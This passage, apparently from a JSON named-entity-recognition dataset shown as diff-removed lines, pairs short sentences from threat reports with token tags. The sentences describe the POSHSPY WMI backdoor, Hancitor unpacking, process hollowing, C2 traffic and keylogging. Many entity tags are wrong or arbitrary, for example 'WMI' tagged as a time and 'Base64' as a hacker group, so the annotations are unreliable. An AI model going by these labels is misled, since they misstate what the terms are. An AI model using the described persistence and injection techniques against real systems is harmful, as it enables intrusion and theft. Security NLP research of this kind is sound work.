- "O" - ] - }, - { - "tokens": [ - "being", - "able", - "to", - "use", - "the", - ".NET", - "framework", - "APIs", - "directly", - "from", - "Python." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "use", - ".NET", - "framework", - "APIs" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "the", - ".NET", - "framework", - "APIs" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "when", - ".NET", - "framework", - "APIs", - "are", - "used", - "in", - "the", - "code" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "WMI", - "to", - "both", - "store", - "and", - "persist", - "the", - "backdoor" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Management", - "Instrumentation", - "(WMI)." - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "B-Way" - ] - }, - { - "tokens": [ - "to", - "use", - "WMI", - "for", - "storage", - "and", - "persistence." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMI", - "provides", - "many", - "administrative", - "capabilities", - "on", - "local", - "and", - "remote", - "systems,", - "including", - "querying", - "system", - "information,", - "starting", - "and", - "stopping", - "processes,", - "and", - "setting", - "conditional", - "triggers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "WMI", - "can", - "be", - "accessed", - "using", - "a", - "variety", - "of", - "tools,", - "including", - "the", - "Windows", - "WMI", - "Command-line", - "(wmic.exe),", - "or", - "through", - "APIs", - "accessible", - "to", - "programming", - "and", - "scripting", - "languages", - "such", - "as", - "PowerShell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WMI", - "permanent", - "event", - "subscriptions", - "can", - "be", - "used", - "to", - "trigger", - "actions", - "when", - "specified", - "conditions", - "are", - "met." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Subscriptions", - "consist", - "of", - "three", - "core", - "WMI", - "classes:", - "a", - "Filter,", - "a", - "Consumer,", - "and", - "a", - "FilterToConsumerBinding." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WMI", - "Consumers", - "specify", - "an", - "action", - "to", - "be", - "performed,", - "including", - "executing", - "a", - "command,", - "running", - "a", - "script,", - "adding", - "an", - "entry", - "to", - "a", - "log,", - "or", - "sending", - "an", - "email" - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Creating", - "a", - "WMI", - "permanent", - "event", - "subscription" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMI", - "Filters", - "define", - "conditions", - "that", - "will", - "trigger", - "a", - "Consumer,", - "including", - "system", - "startup,", - "the", - "execution", - "of", - "a", - "program," - ], - "ner_tags": [ - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "created", - "a", - "WMI", - "event", - "subscription", - "in", - "order", - "to", - "execute", - "the", - "backdoor" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "WMI", - "to", - "persist", - "a", - "backdoor", - "and", - "also", - "store", - "the", - "PowerShell", - "backdoor", - "code." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "created", - "a", - "new", - "WMI", - "class", - "and", - "added", - "a", - "text", - "property", - "to", - "it", - "in", - "order", - "to", - "store", - "a", - "string", - "value." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "The", - "WMI", - "component", - "of", - "the", - "POSHSPY", - "backdoor", - "leverages", - "a", - "Filter", - "to", - "execute", - "the", - "PowerShell", - "component", - "of", - "the", - "backdoor", - "on", - "a", - "regular", - "basis." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMI", - "Component" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "“BfeOnServiceStartTypeChange”", - "WMI", - "Query", - "Language", - "(WQL)", - "filter", - "condition", - "The", - "BfeOnServiceStartTypeChange", - "Filter", - "was", - "bound", - "to", - "the", - "CommandLineEventConsumer", - "WindowsParentalControlsMigration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "legitimate", - "WMI", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attacker", - "use", - "of", - "WMI" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "WMI", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O" - ] - }, - { - "tokens": [ - "decrypted,", - "and", - "executed", - "the", - "backdoor", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decoded", - "CommandLineTemplate", - "PowerShell", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wrote", - "the", - "encrypted", - "and", - "base64-encoded", - "PowerShell", - "backdoor", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "base64-encoded", - "PowerShell", - "command." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "executing", - "PowerShell", - "code", - "as", - "an", - "EncodedCommand" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "and", - "execute", - "additional", - "PowerShell", - "code", - "and", - "Windows", - "binaries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downloading", - "and", - "executing", - "PowerShell", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Encrypting", - "communications", - "using", - "AES", - "and", - "RSA", - "public", - "key", - "cryptography" - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Writing", - "executables", - "to", - "a", - "randomly-selected", - "directory", - "under", - "Program", - "Files,", - "and", - "naming", - "the", - "EXE", - "to", - "match", - "the", - "chosen", - "directory", - "name" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Appending", - "a", - "file", - "signature", - "header", - "to", - "all", - "encrypted", - "data," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "appended", - "file", - "headers", - "used", - "to", - "bypass", - "content", - "inspection", - "made", - "this", - "backdoor", - "difficult", - "to", - "identify" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Word", - "document", - "lure", - "requesting", - "the", - "user", - "to", - "run", - "the", - "VBA", - "macro." - ], - "ner_tags": [ - "I-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "opened,", - "the", - "user", - "sees", - "a", - "social", - "engineering", - "image", - "telling", - "them", - "that", - "they", - "must", - "click", - "the", - "“Enable", - "editing”", - "button", - "to", - "see", - "the", - "document’s", - "contents." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Packed", - "DLL", - "analysis" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "packing", - "being", - "used", - "to", - "obfuscate", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "there", - "is", - "indeed", - "some", - "sort", - "of", - "unpacking", - "happening." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Although", - "the", - "unpacking", - "procedure", - "happens", - "in", - "multiple", - "steps" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "soon", - "as", - "the", - "unpacked", - "executable", - "is", - "running" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "Examination", - "of", - "its", - "Unpacking", - "Routine" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "its", - "unpacking", - "routine" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "“.tmp”", - "file", - "is", - "found,", - "it", - "is", - "moved", - "and", - "renamed", - "to", - "the", - "Office", - "templates", - "folder" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loaded", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "As", - "a", - "second", - "argument,", - "the", - "macro", - "passes", - "the", - "entry", - "function", - "“DllUnregisterServer”", - "to", - "rundll32.exe", - "so", - "that", - "the", - "execution", - "starts", - "correctly." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "runs", - "rundll32.exe", - "to", - "load", - "the", - "malware." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executes", - "it", - "using", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Looking", - "at", - "the", - "decrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decryption", - "process", - "starts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "data", - "that", - "will", - "be", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "algorithm", - "to", - "decrypt", - "the", - "data", - "is", - "simple." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "second", - "decryption", - "stage", - "occurs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "memory", - "structure" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Before", - "the", - "decryption", - "starts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contains", - "the", - "decryption", - "algorithm", - "for", - "the", - "second", - "stage" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "output", - "of", - "this", - "decryption" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "executable", - "code", - "used", - "to", - "decrypt", - "the", - "encrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "successfully", - "decrypting", - "the", - "C2", - "URLs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "all", - "the", - "decrypted", - "C2", - "URLs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "calls", - "a", - "decryption", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Although", - "the", - "decoding", - "algorithm", - "of", - "the", - "C2", - "response", - "looks", - "quite", - "complex,", - "it", - "is", - "actually", - "Base64", - "decoding,", - "followed", - "by", - "an", - "XOR", - "operation", - "using", - "the", - "key", - "0x7A." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "decryption", - "function." - ], - "ner_tags": [ - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "can", - "be", - "decrypted", - "to", - "an", - "active", - "malware", - "download", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "API", - "function", - "located", - "at", - "the", - "beginning", - "of", - "the", - "memory", - "section", - "are", - "resolved", - "using", - "GetProcAddress" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Windows", - "API", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "API", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "resolving", - "the", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "names", - "of", - "Windows", - "API", - "functions", - "are", - "stored", - "in", - "the", - "first", - "150", - "bytes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "several", - "Windows", - "API", - "functions", - "are", - "resolved", - "using", - "GetProcAddress" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "memory", - "structure", - "contains", - "executable", - "code." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Data", - "view", - "of", - "the", - "section", - "containing", - "the", - "encrypted", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "area", - "after", - "this", - "contains", - "encrypted", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Structure", - "of", - "the", - "encrypted", - "section." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "URLs", - "contained", - "in", - "the", - "malware", - "itself." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "technique", - "is", - "called", - "self-injection", - "or", - "PE", - "overwrite" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "This", - "function", - "obtains", - "the", - "username," - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "the", - "computer", - "name", - "and", - "the", - "domain", - "of", - "infected", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "computer", - "architecture" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "generated", - "based", - "on", - "the", - "computer", - "architecture." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "subsequent", - "functions", - "collect", - "additional", - "information", - "such", - "as", - "the", - "machine’s", - "public", - "IP", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "determine", - "the", - "command", - "and", - "control", - "(C2)", - "servers", - "waiting", - "for", - "the", - "data", - "to", - "be", - "sent", - "to,", - "the", - "malware", - "calls", - "a", - "decryption", - "function", - "that", - "uses", - "the", - "RC4", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "successfully", - "decrypting", - "the", - "C2", - "URLs,", - "the", - "data", - "is", - "sent", - "there", - "using", - "a", - "HTTP", - "POST", - "request", - "adding", - "the", - "constructed", - "query", - "string", - "as", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "making", - "a", - "HTTP", - "GET", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "initiates", - "a", - "download,", - "which", - "delivers", - "an", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Its", - "main", - "purpose", - "is", - "to", - "download", - "and", - "execute", - "a", - "second", - "stage", - "malware", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Thread", - "Execution", - "Hijacking" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Thread", - "Execution", - "Hijacking" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "final", - "execution", - "method", - "Hancitor", - "supports", - "is", - "Thread", - "Execution", - "Hijacking." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "only", - "difference", - "is", - "that", - "the", - "malware", - "replaces", - "the", - "thread", - "context", - "with", - "the", - "downloaded", - "executable", - "and", - "resumes", - "it", - "afterwards." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "Hollowing" - ], - "ner_tags": [ - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Process", - "Hollowing" - ], - "ner_tags": [ - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "If", - "the", - "Process", - "Hollowing", - "method", - "is", - "used,", - "a", - "new", - "svchost.exe", - "process", - "is", - "created", - "in", - "a", - "suspended", - "state." - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "then", - "allocates", - "new", - "memory", - "in", - "the", - "newly-created", - "process,", - "writes", - "the", - "executable", - "to", - "it", - "and", - "executes", - "it", - "in", - "a", - "new", - "thread." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Process", - "Injection", - "method" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "was", - "distributed", - "as", - "email", - "Word", - "document", - "attachments" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-SamFile", - "B-Way" - ] - }, - { - "tokens": [ - "then", - "recursively", - "searches", - "through", - "all", - "local", - "temp", - "folders." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Query", - "string", - "containing", - "system", - "information", - "before", - "being", - "sent", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "backdoor", - "uses", - "domain", - "fronting", - "to", - "obfuscate", - "its", - "true", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "fronted", - "domain", - "is", - "configured", - "by", - "an", - "earlier", - "stage", - "of", - "execution", - "and", - "the", - "actual", - "domain", - "is", - "hard-coded", - "in", - "the", - "backdoor." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "initiated", - "the", - "first", - "connection", - "to", - "the", - "fronted", - "domain" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "communicates", - "with", - "its", - "C2", - "server", - "using", - "HTTPS" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "its", - "C2", - "server", - "consists", - "of", - "JSON", - "data", - "exchanged", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "POST", - "request", - "that", - "contains", - "the", - "command", - "output." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "C2", - "server", - "via", - "a", - "subsequent", - "HTTP", - "POST", - "request" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "its", - "C2", - "server", - "via", - "a", - "subsequent", - "HTTP", - "POST", - "request." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "its", - "C2", - "server", - "every", - "five", - "seconds", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "backdoor", - "that", - "supports", - "commands,", - "including", - "screen", - "capture" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "Upload", - "a", - "screen", - "capture" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "keystroke", - "capture" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "backdoor", - "writes", - "captured", - "keystrokes", - "to", - "memory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "continuously", - "captures", - "keystrokes" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "keylogging", - "utility" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "attacker", - "utilized", - "an", - "additional", - "keylogging", - "utility" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "keylogging", - "utility", - "was", - "configured", - "to", - "capture", - "and", - "record", - "keystrokes", - "to", - "C:\\ProgramData\\psh\\System32Log.txt." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "Keylogger", - "Deployment" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "keylogger" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "backdoor", - "may", - "also", - "download", - "and", - "execute", - "additional", - "PowerShell", - "commands", - "from", - "its", - "command", - "and", - "control", - "(C2)", - "server." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downloaded", - "VBScript", - "and", - "PowerShell" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "PowerShell", - "script", - "block", - "was", - "executed", - "to", - "download" - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "to", - "connect", - "to", - "third-party", - "file", - "sharing", - "sites", - "to", - "download", - "the", - "UltraVNC", - "application" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PowerShell", - "to", - "connect", - "to", - "third-party", - "file", - "sharing", - "sites", - "to", - "download", - "an", - "NGROK", - "utility" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "UltraVNC", - "to", - "download", - "two", - "LNK", - "files" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "UltraVNC", - "to", - "download", - "an", - "in-memory", - "dropper" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "UltraVNC", - "to", - "download", - "and", - "store", - "a", - "file" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deployed", - "additional", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Data", - "field", - "may", - "contain", - "RC4-encrypted,", - "Base64-encoded", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "backdoor", - "uses", - "an", - "RC4", - "key", - "configured", - "by", - "an", - "earlier", - "stage", - "of", - "execution", - "to", - "encrypt", - "and", - "decrypt", - "the", - "Data", - "field" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "observed", - "the", - "RC4", - "key", - "UwOdHsFXjdCOIrjTCfnblwEZ", - "used", - "for", - "RC4", - "encryption", - "and", - "decryption." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - 